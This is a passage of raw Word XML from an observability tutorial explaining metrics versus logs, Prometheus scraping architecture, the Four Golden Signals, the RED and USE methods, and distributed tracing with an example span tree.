    <w:p w14:paraId="1CCF4502" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Pre-computed on client side. Not aggregatable across instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56972A74" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why metrics are efficient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00447DFC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1D7DB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Logs: 500 bytes per event × 100 events/sec = 50 KB/sec per metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2C5F4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Metrics: 8 bytes (float64) every 15 seconds = 0.53 bytes/sec per metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0D7E3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2DF70CCA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Metrics are 100,000x more storage-efficient than logs for the same information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B26C62" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>But: metrics are PRE-AGGREGATED — you lose individual event details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF4E4FC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="6A017B46" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Metrics answer: "What is the error rate?" (aggregate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E32391" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Logs answer: "Which specific request failed and why?" (individual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8442D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metrics architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC254C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFC23B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB214F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Applications expose /metrics endpoint (Prometheus format)       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75399F4D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA13161" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ # HELP http_requests_total Total HTTP requests                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F01900" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ # TYPE http_requests_total counter                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFBE8C5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ http_requests_total{method="GET",status="200"} 142857           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DAA42" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ http_requests_total{method="POST",status="500"} 23              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01194D8B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C07D60" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">         ↑ scrape every 15s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96A856" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4D617" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Prometheus Server                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65560B17" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>│  - Scrapes targets at regular intervals                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F47049" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Stores time-series data (TSDB)                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C846ED2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Evaluates alerting rules                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C4102" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  - Serves PromQL queries                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876D7F2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6247403F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627888DA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          ┌───────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4526F67A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA73A6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    ┌──────────┐ ┌──────────┐ ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC36C2A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    │ Grafana  │ │AlertMgr  │ │Long-term │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03195E55" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    │(dashboards)│ │(pages/  │ │(Thanos/  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44898A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    │          │ │ Slack)   │ │ Mimir)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D68DA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    └──────────┘ └──────────┘ └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C2506" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Essential metrics (The Four Golden Signals — Google SRE):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63"/>
        <w:gridCol w:w="2261"/>
        <w:gridCol w:w="5626"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="30FC932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752900" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Signal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B2CC53" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Measures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55787F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="162E75F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A6121D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Latency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11BF4C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Time to serve a request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E49B82" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>http_request_duration_seconds (histogram)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="36A5B3A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712163" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Traffic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1A8878" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Demand on the system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F20B3B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>http_requests_total (counter, rate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="420F6BB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E9B04A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Errors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1CB736" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Rate of failed requests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AD7287" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>http_requests_total{status=~"5.."} / total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="277074B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A396E1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Saturation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E0224E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>How "full" the system is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91121C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>CPU%, memory%, queue depth, connection pool usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="203B7C2F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The RED Method (for request-driven services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2517E4C7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B067A2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>Rate:     requests per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A847451" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Errors:   errors per second (or error percentage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366EFF53" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Duration: latency distribution (histogram/percentiles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45D9F5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The USE Method (for resources — CPU, memory, disk, network):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C77ECC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D581612" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Utilization: % time resource is busy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753B90F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Saturation:  queue depth (work waiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF4C7E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Errors:      error count for that resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745641A8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Traces — Distributed Request Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21B99A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What traces are:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t> A record of a request's journey through multiple services, showing the causal chain of operations, their durations, and their relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DA0E42" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61AE20" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Trace (one user request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61EBA6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099A19F9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ Trace ID: abc123def456                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E310B0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0428B8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│ </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> Span: API Gateway (12ms)                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B138F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│ │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> Span: Auth Service - validate token (3ms)                   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49F9F6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ │   └── Span: Order Service - create order (250ms)                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407483C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│ │       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> Span: Inventory Service - check stock (15ms)            </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266ACEA2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│ │       </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> Span: Payment Service - charge card (180ms)             </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85F677" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│ │       │   </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> Span: Stripe API call (150ms)  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> SLOW!             </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D165D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ │       │   └── Span: DB write - payment record (8ms)               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FAD2D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│ │       └── Span: DB write - order record (12ms)                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29836473" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
